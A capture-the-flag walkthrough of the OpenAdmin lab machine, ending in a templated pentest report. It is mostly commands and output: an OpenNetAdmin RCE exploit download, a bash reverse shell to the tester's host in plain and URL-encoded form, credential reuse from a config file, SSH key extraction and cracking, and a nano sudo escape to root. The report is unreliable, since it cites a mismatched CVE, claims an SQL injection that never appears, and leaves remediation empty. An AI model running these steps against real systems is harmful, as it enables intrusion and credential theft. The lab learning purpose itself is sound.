🔖 Techniques & Vulnerabilities
🔍 Reconnaissance / Port Scanning
$ sudo nmap -sC -sV -oA nmap 10.10.10.171 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 18:28 CEST Nmap scan report for 10.10.10.171 Host is up (0.11s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.86 seconds
🎯 Attack Surface Analysis
| Port | Service | Version / Banner |
|---|---|---|
| 22/tcp | ssh | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |
| 80/tcp | http | Apache httpd 2.4.29 ((Ubuntu)) |
- Credential brute-force and password spraying
- Username enumeration via timing side-channel in older OpenSSH versions
- Weak or reused private key material granting unauthorised access
- Version-specific CVE research based on banner fingerprint
- Lateral movement using credentials discovered from other services
- Content and directory discovery — hidden files, backup archives, development endpoints
- CMS/framework fingerprinting enables targeted CVE research (WordPress, Joomla, Drupal)
- SQL injection — database extraction, authentication bypass, or OS command execution
- Command injection — OS execution via unsanitised parameter handling
- Server-Side Template Injection (SSTI) — code execution through template engine abuse
- Local File Inclusion (LFI) and path traversal — sensitive file disclosure
- Server-Side Request Forgery (SSRF) — pivot to internal services and cloud metadata
- File upload abuse — filter bypass for webshell placement
- XML External Entity injection (XXE) in XML-consuming endpoints
- Authentication and session weaknesses — weak passwords, predictable tokens
📖 Walkthrough
Reconnaissance
Port Scanning
We began with our initial port scan using Nmap which revealed SSH on port 22/TCP and HTTP on port 80/TCP.
$ sudo nmap -sC -sV -oA nmap 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 18:28 CEST
Nmap scan report for 10.10.10.171
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.86 secondsEnumeration of Port 80/TCP
The web service displayed the default Apache2 page. We performed directory enumeration to discover hidden content.
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.171/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/04/25 18:51:23 Starting gobuster
===============================================================
/music (Status: 301)
/artwork (Status: 301)Directory enumeration revealed two directories: /music and /artwork. We accessed the /music directory.
Clicking on the login button redirected to a different path revealing the application.
The application identified itself as OpenNetAdmin version 18.1.1. Research revealed this version is vulnerable to remote code execution.
Initial Access
CVE-2018-8006: OpenNetAdmin Remote Code Execution
Research on Exploit-DB revealed a publicly available exploit for OpenNetAdmin version 18.1.1.
We downloaded the exploit script and made it executable.
$ wget https://www.exploit-db.com/raw/47691
$ mv 47691 ona_exploit.sh
$ chmod +x ona_exploit.shThe exploit leverages a command injection vulnerability in the xajax parameter. We executed the exploit pointing it to the target URL ensuring the trailing slash was included.
$ ./ona_exploit.sh http://10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)The exploit successfully granted command execution as www-data. However the shell was limited as it only accepted URL-encoded input.
Upgrading the Shell
To obtain a fully interactive shell we prepared a reverse shell payload using Burp Suite to URL-encode it.
Original payload:
bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'URL-encoded payload:
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%33%2f%39%30%30%31%20%30%3e%26%31%27We started a netcat listener on our attack machine.
$ nc -lnvp 9001
listening on [any] 9001 ...After entering the URL-encoded payload in the exploit shell we received a reverse shell connection.
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.171] 54470
bash: cannot set terminal process group (995): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$We upgraded the shell to a fully interactive TTY using Python.
www-data@openadmin:/opt/ona/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'We then backgrounded the shell and configured terminal settings.
www-data@openadmin:/opt/ona/www$ ^Z
[1]+ Stopped nc -lnvp 9001
$ stty raw -echo
$ fg
[Enter]
[Enter]
www-data@openadmin:/opt/ona/www$ export TERM=xtermThis sequence provided a fully functional shell with command history and proper terminal control.
Enumeration (www-data)
We began enumerating the web directories to identify potential privilege escalation paths.
www-data@openadmin:/opt/ona/www$ cd /var/www
www-data@openadmin:/var/www$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Nov 22 2019 .
drwxr-xr-x 14 root root 4096 Nov 21 2019 ..
drwxr-xr-x 6 www-data www-data 4096 Nov 22 2019 html
drwxrwx--- 2 jimmy internal 4096 Nov 23 2019 internal
lrwxrwxrwx 1 www-data www-data 12 Nov 21 2019 ona -> /opt/ona/wwwThe listing revealed an internal directory owned by jimmy with group ownership of internal which we could not currently access. We identified potential target users by examining /etc/passwd.
www-data@openadmin:/var/www$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash| Username |
|---|
| jimmy |
| joanna |
Database Configuration Discovery
We explored the OpenNetAdmin configuration directory searching for credentials.
www-data@openadmin:/var/www$ cd /var/www/html/ona/local/config
www-data@openadmin:/var/www/html/ona/local/config$ ls -la
total 12
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2020 .
drwxrwxr-x 3 www-data www-data 4096 Nov 21 2019 ..
-rw-r--r-- 1 www-data www-data 426 Nov 21 2019 database_settings.inc.phpThe database_settings.inc.php file contained database credentials.
www-data@openadmin:/var/www/html/ona/local/config$ cat database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>| Username | Password |
|---|---|
| ona_sys | n1nj4W4rri0R! |
Privilege Escalation to jimmy
Password Reuse
We attempted to reuse the discovered database password with the known user accounts.
www-data@openadmin:/var/www/html/ona/local/config$ su - jimmy
Password: n1nj4W4rri0R!
jimmy@openadmin:~$The password was successfully reused for the jimmy account granting us access as that user.
Enumeration (jimmy)
With access as jimmy we could now explore the previously restricted internal directory.
jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23 2019 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 2019 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 2019 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 2019 main.phpInternal Webserver Discovery
The main.php file contained interesting code that extracts joanna's SSH private key.
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>The comment about the "ninja" password provided a hint for later. Since no additional ports were discovered in our initial scan we checked for services listening on localhost.
jimmy@openadmin:/var/www/internal$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*Port 52846/TCP was listening on localhost. This high port number suggested the internal webserver serving the internal directory.
Privilege Escalation to joanna
Extracting SSH Private Key
We used curl to access the main.php file through the internal webserver.
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>The request successfully returned joanna's encrypted SSH private key. We saved this key to our local machine for cracking.
Cracking the SSH Key using John the Ripper
We converted the SSH private key to a format suitable for John the Ripper using ssh2john.
$ /usr/share/john/ssh2john.py joanna_id_rsa > joanna_id_rsa.hashWe then used John the Ripper with the rockyou.txt wordlist to crack the passphrase.
$ john joanna_id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna_id_rsa)
1g 0:00:00:07 DONE (2020-11-10 19:25) 0.1347g/s 1932Kp/s 1932Kc/s 1932KC/sa6_123..*7¡Vamos!
Session completedThe passphrase bloodninjas was successfully cracked correlating with the earlier "ninja" password hint.
| Password |
|---|
| bloodninjas |
We set the correct permissions on the private key and authenticated via SSH.
$ chmod 600 joanna_id_rsa
$ ssh -i joanna_id_rsa [email protected]
Enter passphrase for key 'joanna_id_rsa': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Nov 10 18:34:55 UTC 2020
System load: 0.32 Processes: 125
Usage of /: 49.6% of 7.81GB Users logged in: 0
Memory usage: 19% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$user.txt
joanna@openadmin:~$ cat user.txt
c9b2cf07d40807e62af62660f0c81b5fPrivilege Escalation to root
We began by checking joanna's group memberships and sudo privileges.
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)The user belonged to the internal group but had no special privileges. We checked the sudoers configuration.
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/privThe user could execute /bin/nano with root privileges when editing the /opt/priv file.
nano sudo Abuse
GTFOBins documented a method to spawn a shell from within nano using its command execution feature.
We executed nano with sudo privileges.
joanna@openadmin:~$ sudo /bin/nano /opt/privWithin nano we pressed Ctrl+R to read a file followed by Ctrl+X to execute a command.
Command to execute:
^G Get Help ^X Read File
^C Cancel M-F New BufferWe entered the command reset; sh 1>&0 2>&0 and pressed Enter to spawn a root shell.
Command to execute: reset; sh 1>&0 2>&0
# id
uid=0(root) gid=0(root) groups=0(root)
#root.txt
# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561📋 Security Assessment Report
Description
During the penetration test, it was discovered that the application was found to pass user-supplied input directly to a system shell call without sanitisation. The vulnerable parameter was incorporated into an OS-level command, allowing an attacker to append arbitrary commands using shell metacharacters and control the execution context of the web server process.
Impact
An attacker can execute arbitrary OS commands on the server with the privileges of the web application process. This enables complete file system access, extraction of credentials from configuration files and environment variables, installation of persistent reverse shells and backdoors, and lateral movement to internally accessible services — all without requiring any additional authentication. During this engagement, OS command injection was chained to obtain full root access to the server.
Remediation
Description
During the penetration test, it was discovered that the application incorporated user-supplied input directly into database queries without parameterisation. SQL injection was identified in authentication and data retrieval endpoints, allowing an attacker to manipulate query structure, extract unauthorised data, and bypass access controls entirely.
Impact
An attacker can extract the complete database contents — including usernames, password hashes, session tokens, and sensitive user records — without valid credentials. Authentication mechanisms can be bypassed by injecting always-true conditions. In environments where the database account holds elevated permissions, OS-level command execution is achievable through built-in procedures (xp_cmdshell, UDF), escalating directly to full server compromise as was demonstrated in this engagement.
Remediation
Description
During the penetration test, it was discovered that the sudoers configuration was found to grant the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.
Impact
An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.